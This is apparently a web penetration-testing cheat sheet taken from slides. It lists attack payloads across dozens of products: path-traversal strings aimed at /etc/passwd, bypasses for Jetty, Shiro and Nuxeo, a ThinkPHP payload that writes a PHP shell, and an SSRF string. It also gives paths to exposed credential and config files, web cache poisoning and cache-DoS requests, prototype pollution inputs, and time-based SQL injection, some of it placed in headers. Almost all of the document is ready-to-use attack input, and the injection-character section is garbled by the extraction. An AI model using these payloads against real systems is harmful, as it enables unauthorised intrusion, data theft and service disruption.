Page not found AND DEBUG = True

http.title:"DisallowedHost at /"
Attack Surface
7 - Common CVE and Misconfiguration

Joomla

administrator/manifests/files/joomla.xml
administrator
api/index.php/v1/config/application?public=true
api/index.php/v1/users?public=true

Docker

v2/_catalog
docker-compose.yml

Apache Dubbo

org.vulhub.api.CalcService Port 2181

ElasticSearch

_search?pretty
_all/_search?q=email
_cat/indices?v
Port 9200
_plugin/head
_plugin/head/../../../../../../../../../etc/passwd
_snapshot/xxxxxxx

Apache Flink AND GeoServer OGC

geoserver/ows?service

jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Attack Surface
7 - Common CVE and Misconfiguration

ManagedEngine

fosagent/repl/download-snapshot
fosagent/repl/download-file

Magento

index.php/admin/
downloader/

GlassFish

theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c
0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

GoAhead Web Server

cgi-bin/index

Grafana

public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd
public/plugins/cloudwatch/../../../../../../../../../../../../../etc/passwd
public/plugins/dashlist/../../../../../../../../../../../../../etc/passwd
public/plugins/elasticsearch/../../../../../../../../../../../../../etc/passwd
public/plugins/graph/../../../../../../../../../../../../../etc/passwd
public/plugins/graphite/../../../../../../../../../../../../../etc/passwd
public/plugins/heatmap/../../../../../../../../../../../../../etc/passwd
public/plugins/influxdb/../../../../../../../../../../../../../etc/passwd
public/plugins/mysql/../../../../../../../../../../../../../etc/passwd
public/plugins/opentsdb/../../../../../../../../../../../../../etc/passwd
public/plugins/pluginlist/../../../../../../../../../../../../../etc/passwd
public/plugins/postgres/../../../../../../../../../../../../../etc/passwd
public/plugins/prometheus/../../../../../../../../../../../../../etc/passwd
public/plugins/stackdriver/../../../../../../../../../../../../../etc/passwd
public/plugins/table/../../../../../../../../../../../../../etc/passwd
public/plugins/text/../../../../../../../../../../../../../etc/passwd
public/plugins/welcome/#/../../../../../../../../../../../../../etc/passwd
Attack Surface
7 - Common CVE and Misconfiguration

H2 Database

h2-console/

kibana

kibana
app/kibana

api/console/api_server?sense_version=%40%40SENSE_VERSIO
N&apis=../../../../../../../../../../../etc/passwd

phpmyadmin

Admin/setup/index.php
admin/phpMyAdmin/setup/index.php
admin/pma/setup/index.php
phpMyAdmin/main.php
phpmyadmin/admin/setup/index.php
phpmyadmin/pma/
phpmyadmin/scripts/setup.php
phpmyadmin/setup/
phpmyadmin/setup/index.php

index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
scripts/setup.php
Attack Surface
7 - Common CVE and Misconfiguration

Apache HTTPD

?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/

.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32
%65/.%%32%65/etc/passwd

JBoss

invoker/readonly
jbossmq-httpil/HTTPServerILServlet
invoker/JMXInvokerServlet
jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
web-console/ServerInfo.jsp
invoker/JMXInvokerServlet
admin-console/

Jetty

%2e/WEB-INF/web.xml
%u002e/WEB-INF/web.xml
.%00/WEB-INF/web.xml
/..;/ "><iframe/src=javascript:alert(1)>
Attack Surface
7 - Common CVE and Misconfiguration

Jira

servicedesk/signup
secure/admin/AddSmtpMailServer!default.jspa
secure/admin/ViewApplicationProperties.jspa
secure/ContactAdministrators!default.jspa
secure/admin/MailQueueAdmin!default.jspa
QueryComponentRendererValue!Default.jspa?assignee=user:admin

Laravel

_ignition/execute-solution

Liferay Portal

api/jsonws/invoke

JimuReport OR Jumpserver

jmreport/queryFieldBySql
core/auth/password/forget/previewing/

Apache Kafka

druid/indexer/v1/sampler?for=connect
Attack Surface
7 - Common CVE and Misconfiguration

Metabase

api/geojson?url=file:////etc/passwd
api/session/properties
api/setup/validate

MeterSphere

plugin/list
plugin/add

MinIO

minio/bootstrap/v1/verify

Nacos

nacos/v1/auth/users?pageNo=1&pageSize=9

Nexus Repository Manager

service/extdirect
service/rest/beta/repositories/go/group
%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

uwsgi

..%2f..%2f..%2f..%2f..%2fetc/passwd
Attack Surface
7 - Common CVE and Misconfiguration

Nginx

///////../../../../../../../etc/passwd
/////////////////////////../../../../../../../../etc/passwd

..
../
../something
../../something
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../something

Apache OFBiz

webtools/control/xmlrpc
webtools/control/ProgramExport/

OpenTSDB

api/suggest?type=metrics&q=&max=10

Openfire

getFavicon?host=192.168.176.1:8080/secrets.txt?
plugins/search/..\..\..\conf\openfire.xml
setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

OpenEMR

portal/account/register.php

Umbraco

Umbraco
Attack Surface
7 - Common CVE and Misconfiguration

pgAdmin

misc/validate_binary_path

Ruby on Rails

file:///%2f%2f/etc/passwd

Accept: ../../../../../../../../etc/passwd{{

X-Forwarded-Scheme: http

Rocketchat

api/v1/method.callAnon/sendForgotPasswordEmail

Apache Shiro

./admin
xxx/..;/admin/

Apache Solr

admin/cores?indexInfo=false&wt=json
solr/admin/cores?indexInfo=false&wt=json

TeamCity

app/rest/users/id:1/tokens/RPC2
hax?jsp=/app/rest/server;.jsp
res/../admin/diagnostic.jsp
.well-known/acme-challenge/../../admin/diagnostic.jsp
update/../admin/diagnostic.jsp
Attack Surface
7 - Common CVE and Misconfiguration

Spring Boot Actuator

%0aactuator
%0dactuator
actuator/auditevents
actuator/beans
actuator/caches
actuator/conditions
actuator/configprops
actuator/env
actuator/flyway
actuator/health
actuator/heapdump
actuator/httptrace
actuator/info
actuator/integrationgraph
actuator/liquibase
actuator/logfile
actuator/mappings
actuator/metrics
actuator/prometheus
actuator/scheduledtasks
actuator/sessions
actuator/shutdown
actuator/threaddump

Spring Cloud Gateway Actuator

actuator/gateway/routes
actuator/gateway/refresh

ThinkPHP

?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?
>+shell.php
Attack Surface
7 - Common CVE and Misconfiguration

Weblogic

wls-wsat/CoordinatorPortType
ws_utc/config.do
console/css/%252e%252e%252fconsole.portal
uddiexplorer/SearchPublicRegistries.jsp
.//META-INF/MANIFEST.MF
.//WEB-INF/web.xml
.//WEB-INF/portlet.xml
.//WEB-INF/weblogic.xml

V2board AND Webmin

api/v1/user/info
password_change.cgi

Strapi

admin/strapiVersion
admin/plugins/users-permissions/auth/reset-password

WordPress

wp-login.php
wp-config.php.bak
xmlrpc.php
wp-cron.php
wp-content/debug.log
wp-config.php.save
wp-json/wp/v2/pages
wp-json/wp/v2/posts
Attack Surface
7 - Common CVE and Misconfiguration

Nuxeo

login.jsp
xx/..;/login.jsp
maintenance/..;/login.jsp
nuxeo/login.jsp
xx/..;/nuxeo/login.jsp
maintenance/..;/nuxeo/login.jsp
login.jsp/pwn${7+7}.xhtml
xx/..;/login.jsp/pwn${7+7}.xhtml
maintenance/..;/login.jsp/pwn${7+7}.xhtml
nuxeo/login.jsp/pwn${7+7}.xhtml
xx/..;/nuxeo/login.jsp/pwn${7+7}.xhtml
maintenance/..;/nuxeo/login.jsp/pwn${7+7}.xhtml
Attack Surface
8 - Grep Interesting Data

Express NodeJS Deserialization

X-Powered-By: Express <pre>Cannot GET /</pre> Set-Cookie: .*=eyJ

Java Deserialization in ViewState

javax.faces.ViewState ViewState(.)?H4sIAA ViewState(.)?rO0AB

(rO0AB|H4sIAA)

Json.Net Deserialization

deserialize AND Json.Net

Quick Testing
1 - Sensitive directories AND Files

groovyconsole
server-info
.aws/config
.aws/credentials
app.config
web.config
Appsettings.json
local.settings.json
.svn::$INDEX_ALLOCATION/entries
hsqldb
jkstatus;
dashboard
install.php
admin
login.jsp
settings.py
.htaccess
.DS_Store
portal
elmah.axd
env.js
console
.svn/entries
.config/.boto
config.js
.git
credentials.db
.git/config
actuator/gateway/routes
conf
dbconsole
login
gateway/routes
jkstatus
.ssh
.env
.aws/x/..;/config
status
asynchPeople
server-status
whoAmI
servicedesk
jmx-console
actuator/env
salesforce.js
_fragment
90-local.conf
manager
tmui/login.jsp
Trace.axd
mifs
home
solr
virtualjdbc
.aws/x/../config
actuator/heapdump
script
////../../../../etc/passwd
signup
////////../../../../etc/passwd
dev
wp-admin/install.php
user.txt
Wp-config.php~
users.txt
phppgadmin
uploads
cgi-bin
login.php
phpmyadmin
phpinfo.php
adminer.php
db.xml
kibana
sqlite
Quick Testing
2 - Injection Test

Unicode Characters
.
%2E
%252E
%25252E
/
%2F %E3%80%82
%252F %25E3%2580%2582
%25252F
\ %2525E3%252580%252582
%5C %E2%88%95
%255C
%25255C %25E2%2588%2595 %20HTTP/7.7%0dHeader:
%20HTTP/7.7%0aHeader:
% %2525E2%252588%252595 %20HTTP/7.7%0d%0aHeader:
%25
%2525 %E2%88%96 %2520HTTP/7.7%250dHeader:
%2520HTTP/7.7%250aHeader:
%252525 %25E2%2588%2596 %2520HTTP/7.7%250d%250aHeader:
?
%3F
%2525E2%252588%252596 %252520HTTP/7.7%25250dHeader:
%253F %D9%AA %252520HTTP/7.7%25250aHeader:
%25253F %252520HTTP/7.7%25250d%25250aHeader:
;
%25D9%25AA ../?
%3B %2525D9%2525AA ..\?
%253B %2E%2E%2F%3F
%EF%B9%96 %2E%2E%5C%3F
%25253B
# %25EF%25B9%2596 %252E%252E%252F%253F
%252E%252E%255C%253F
%23 %2525EF%2525B9%252596 %25252E%25252E%25252F%25253F
%2523
%252523 %EF%B9%94 %25252E%25252E%25255C%25253F
..;/?
@ %25EF%25B9%2594 ..;\?
%40
%2540 %2525EF%2525B9%252594 %2E%2E%3B%2F%3F
%2E%2E%3B%5C%3F
%252540 %EF%BC%83 %252E%252E%253B%252F%253F
&
%26
%25EF%25BC%2583 %252E%252E%253B%255C%253F
%2526 %2525EF%2525BC%252583 %25252E%25252E%25253B%25252F%25253
%252526 F
%A0
%EF%BC%A0 %25252E%25252E%25253B%25255C2525%
%25A0 %25EF%25BC%25A0 3F
%2525A0 .BURPCollaborator?
%2525EF%2525BC%2525A0 %2EBURPCollaborator%3F
%20
%2520 %EF%BC%86 %252EBURPCollaborator%253F
%25252EBURPCollaborator%25253F
%252520 %25EF%25BC%2586 @BURPCollaborator?
%00
%2500 %2525EF%2525BC%252586 %40BURPCollaborator%3F
%2540BURPCollaborator%253F
%252500 %E5%98%8D %252540BURPCollaborator%25253F
%FF
%25FF %25E5%2598%258D
%2525FF %2525E5%252598%25258D
%0d
%250d
%E5%98%8A
%25250d %25E5%2598%258A
%0a %2525E5%252598%25258A
%250a
%25250a
Quick Testing
3 - SSPP AND Mass Assignment Detection

access_level
account_id
account_status
account_type
activation_code
admin
api_key
auth_token
bank_account
billing_address
birthplace
card_cvc
card_expiry
card_number
certification
{"Parameter":"Value","FUZZ":"something"}
company
company_id
created_at
{"Parameter":"Value\",\"FUZZ\":\"something"}
created_by
credit_score
date_of_birth
degree
deleted_at
deleted_by
department
department_id
driver_license
education
email
employment_status
expenses
experience
fax_number
gender
group
iban
income
invoice_id
is_admin
Parameter=Value&FUZZ=Value%23
is_moderator
is_staff admin Parameter=Value%26FUZZ=Value%23
is_superuser
item_id Parameter=Value&FUZZ=Value%2523
last_login
login_attempts
true Parameter=Value%2526FUZZ=Value%2523
manager
manager_id
marital_status
1 Parameter=Value&FUZZ=Value%252523
membership
mfa_enabled
Parameter=Value%252526FUZZ=Value%252523
nationality
order_id
organization
organization_id
otp
owner
owner_id
passport_number
password
password_hash
password_salt
payment_method
payment_status
permissions
phone_number
plan
privileges
profile_id
project
project_id
reference
reset_token
role
routing_number
salary
security_answer
security_question
session_token
shipping_address
skill
social_security_number
status
subscription
swift_code
task
task_id
tax_id
team
team_id
tier
transaction_id
two_factor_enabled
updated_at
updated_by
user_group
user_id
user_role
user_type
username
website
Web Cache Poisoning
1 - Web Cache Detection

Session Handling :

Rule Description = add random data

Rule actions :
1 - set parameter _parameter=#RANDOMNUMBER#
2 - set cookie _cookie=#RANDOMNUMBER#
3 - set header User-Agent: Mozilla/#RANDOMNUMBER#
4 - Invoke Burp Extension Randomizer
Tools Scope = mark all
URL scope = Include all URLs

Pragma: akamai-x-cache-on,akamai-x-check-cacheable,akamai-x-get-cache-key,akamai-x-get-extracted-values,akamai-x-get-true-cache-key,akamai-x-get-request-id,akamai-x-get-client-ip

Fastly-Debug: 1

Age
CDN-Cache
CF-Cache-Status
Cdn_Cache_Status
Server-Timing
X-Cache
X-Cache-Info
X-Cache-Remote
X-Check-Cacheable
X-Drupal-Cache
X-Drupal-Dynamic-Cache
X-Proxy-Cache
X-Rack-Cache
Akamai-Cache-Status
Web Cache Poisoning
2 - Web Cache Poisoning Unkey Headers Detection

Referer
REFERER
X-Wap-Network-Client-Ip
X-WAP-NETWORK-CLIENT-IP
X-Wap-Client-Ip
X-WAP-CLIENT-IP
X-Wap-Profile
X-WAP-PROFILE
X-True-Ip
X-TRUE-IP
X-Rewrite-Url
X-REWRITE-URL
X-Remote-Ip
X-REMOTE-IP
X-Remote-Addr
X-REMOTE-ADDR
X-Real-Ip
X-REAL-IP
X-Real-Host
X-REAL-HOST
X-Proxyuser-Uri
X-PROXYUSER-URI
X-Proxyuser-Ip
X-PROXYUSER-IP
X-Proxyuser-Host
X-PROXYUSER-HOST
X-Originating-Ip
X-ORIGINATING-IP
X-Originating-Host
X-ORIGINATING-HOST
X-Original-User-Agent
X-ORIGINAL-USER-AGENT
X-Original-Url
X-ORIGINAL-URL
X-Original-Referer
X-ORIGINAL-REFERER
X-Original-Host
X-ORIGINAL-HOST
X-Original-Forwarded-For
X-ORIGINAL-FORWARDED-FOR
X-Original-Cookie
X-ORIGINAL-COOKIE
X-Host
X-HOST
X-Http-Forwarded-For
X-HTTP-FORWARDED-FOR
X-Forwarded-Uri
X-FORWARDED-URI
X-Forwarded-Server
X-FORWARDED-SERVER
X-Forwarded-Path
X-FORWARDED-PATH
X-Forwarded-Host
X-FORWARDED-HOST
X-Forwarded-For
X-FORWARDED-FOR
X-Forwarded-For-Original
X-FORWARDED-FOR-ORIGINAL
X-Forwarded-Client-Ip
X-FORWARDED-CLIENT-IP
X-Forwarded-By
X-FORWARDED-BY
X-Cluster-Client-Ip
X-CLUSTER-CLIENT-IP
X-Client-Ip
X-CLIENT-IP
True-Client-Ip
TRUE-CLIENT-IP
Forwarded
FORWARDED
Fastly-Client-Ip
FASTLY-CLIENT-IP
Client-Ip
CLIENT-IP
Cf-Connecting-Ip
CF-CONNECTING-IP
Akamai-Client-Ip
Web Cache Poisoning
2 - Web Cache Poisoning Unkey Headers Detection

referer
x-wap-network-client-ip X_Wap_Network_Client_Ip
x-wap-client-ip X_Wap_Client_Ip
x-wap-profile X_Wap_Profile
x-true-ip X_True_Ip
x-rewrite-url X_Rewrite_Url
x-remote-ip X_Remote_Ip
x-remote-addr X_Remote_Addr
x-real-ip X_Real_Ip
x-real-host X_Real_Host
x-proxyuser-uri X_Proxyuser_Uri
x-proxyuser-ip X_Proxyuser_Ip
x-proxyuser-host X_Proxyuser_Host
x-originating-ip X_Originating_Ip
x-originating-host X_Originating_Host
x-original-user-agent X_Original_User_Agent
x-original-url X_Original_Url
x-original-referer X_Original_Referer
x-original-host X_Original_Host
x-original-forwarded-for X_Original_Forwarded_For
x-original-cookie X_Original_Cookie
x-host X_Host
x-http-forwarded-for X_Http_Forwarded_For
x-forwarded-uri X_Forwarded_Uri
x-forwarded-server X_Forwarded_Server
x-forwarded-path X_Forwarded_Path
x-forwarded-host X_Forwarded_Host
x-forwarded-for X_Forwarded_For
x-forwarded-for-original X_Forwarded_For_Original
x-forwarded-client-ip X_Forwarded_Client_Ip
x-forwarded-by X_Forwarded_By
x-cluster-client-ip X_Cluster_Client_Ip
x-client-ip X_Client_Ip
true-client-ip True_Client_Ip
forwarded Fastly_Client_Ip
fastly-client-ip Client_Ip
client-ip Cf_Connecting_Ip
cf-connecting-ip
Web Cache Poisoning
3 - Web Cache Poisoning Unkey Cookie Detection

GET / HTTP/1.1
Host: www.company.com
Cookie: FUZZ=xxxxxx;

Web Cache Poisoning

4 - Web Cache Poisoning Unkey Parameters Detection

GET /?FUZZ=xxxxxx HTTP/1.1

Host: www.company.com

GET /?parameter=yy&FUZZ=xxxxxx;parameter=zzzzz HTTP/1.1

Host: www.company.com

Web Cache Poisoning

5 - Web Cache Poisoning Fat GET Detection

GET /?parameter=xxxxxx HTTP/1.1

Host: www.company.com

parameter=yyyyyyy
Web Cache Poisoning
6 - Web Cache Poisoning URL Normalization Detection

GET /cache<h1>OK</h1> HTTP/1.1

Host: www.company.com

GET /cache/../NOTCache HTTP/1.1

Host: www.company.com

GET /cache/%2e%2e%2fNOTCache HTTP/1.1

Host: www.company.com

GET /cache/%252e%252e%252fNOTCache HTTP/1.1

Host: www.company.com
Web Cache Poisoning
7 - Web Cache Poisoning Unkey Port Detection

GET / HTTP/1.1
Host: www.company.com:123
Web Cache Deception
1 - Web Cache Deception Detection

GET /user-Info HTTP/1.1 GET /user-Info/file.css HTTP/1.1

Host: www.company.com Host: www.company.com

.css /
/.css .
/;.css ?
/file.css :
%2Ffile.css #
%25%32%46file.css [
%3Ffile.css ]
%25%33%46file.css @
%0Afile.css user-Info ! Cache Rule

%0Dfile.css $
%0A%0Dfile.css &
Self-XSS " Path Traversal user-Info
%09%0A%0Dfile.css
%25%30%41file.css (
%25%30%30file.css Cache Rule ) Self-XSS
%3Bfile.css *
%25%33%42file.css +
%23file.css ,
%25%32%33file.css ;
=

Cache Rule Path Traversal user-Info

Cache Rule Path Traversal Self-XSS

Web Cache Deception
1 - Web Cache Poisoning DOS Detection

GET /cache HTTP/1.1

Host: www.company.com
\: aaaaaaaaaaaa

GET /cache HTTP/1.1

Host: www.company.com
User-Agent: %0d

GET /cache HTTP/1.1

Host: www.company.com
X-HTTP-Method-Override: HEAD

GET /cache HTTP/1.1

Host: www.company.com
X-Method-Override: HEAD

GET /cache HTTP/1.1

Host: www.company.com
X-HTTP-Method: HEAD

GET /cache HTTP/1.1

Host: www.company.com
User-Agent: aaaaaaaaaaaa 20KB aaaaaaaaaaaa
Web Cache Deception
1 - Web Cache Poisoning DOS Detection

GET /cache HTTP/1.1

Host: www.company.com
X-Forwarded-Scheme: https

GET /cache HTTP/1.1

Host: www.company.com
host: www.company.com

GET /cache HTTP/1.1

Host: www.company.com
X-Forwarded-Port: 88888

GET /cache HTTP/1.1

Host: www.company.com
X-Forwarded-SSL: aaaaaaaaaaaaaaa

GET /cache HTTP/1.1

Host: www.company.com
Upgrade: aaaaaaaaaaaa

GET /cache HTTP/1.1

Host: www.company.com
Referer: aaaaaaaaaaaa
Referer: aaaaaaaaaaaa
Web Cache Deception
1 - Web Cache Poisoning DOS Detection

GET /cache HTTP/1.1

Host: www.company.com
X-Timer: aaaaaaaaaaaa 20KB aaaaaaaaaaaa

GET /cache HTTP/1.1

Host: www.company.com
X-Forwarded-Scheme: aaaaaaaaaaaa 20KB aaaaaaaaaaaa

GET /cache HTTP/1.1

Host: www.company.com
X-Forwarded-Port: aaaaaaaaaaaa 20KB aaaaaaaaaaaa

GET /cache HTTP/1.1

Host: www.company.com
X-Forwarded-SSL: aaaaaaaaaaaa 20KB aaaaaaaaaaaa

GET /cache HTTP/1.1

Host: www.company.com
Connection: keep-alive, aaaaaaaaaaaa 20KB aaaaaaaaaaaa
Prototype Pollution
1 - Prototype Pollution Detection

constructor.prototype.X=Y __proto__.X=Y
constructor[prototype][X]=Y __proto__[X]=Y

,"__proto__": {
"json spaces":10
}

,"constructor": {
"prototype": {
"json spaces":10
}
}
SQL Injection
1 - SQL Injection Detection

OR 1=5 --

' OR 1=5 --

" OR 1=5 --

"XOR(if(now()=sysdate(),sleep(15),0))OR

"XOR(if(now()=sysdate(),sleep(15),0))XOR"X

' ' -- ') ') -- ')) ')) --

\' \' -- \') \') -- \')) \')) --

'' '' -- '') '') -- '')) '')) --

" " -- ") ") -- ")) ")) --

\" \" -- \") \") -- \")) \")) --

"" "" -- "") "") -- "")) "")) --

if(1=1,sleep(15),0)/*'XOR(if(1=1,sleep(15),0))OR'"XOR(if(1=1,sleep(15),0))OR"*/

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

+if(now()=sysdate(),sleep(15),0) --

'XOR(if(now()=sysdate(),sleep(15),0))OR

'XOR(if(now()=sysdate(),sleep(15),0))XOR'X

+waitfor delay '0:0:15' --

'; waitfor delay '0:0:15' --

"; waitfor delay "0:0:15" --

SQL Injection
2 - SQL Injection Headers Detection

User-Agent: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
X-Forwarded-Server: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
X-Forwarded-Host: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
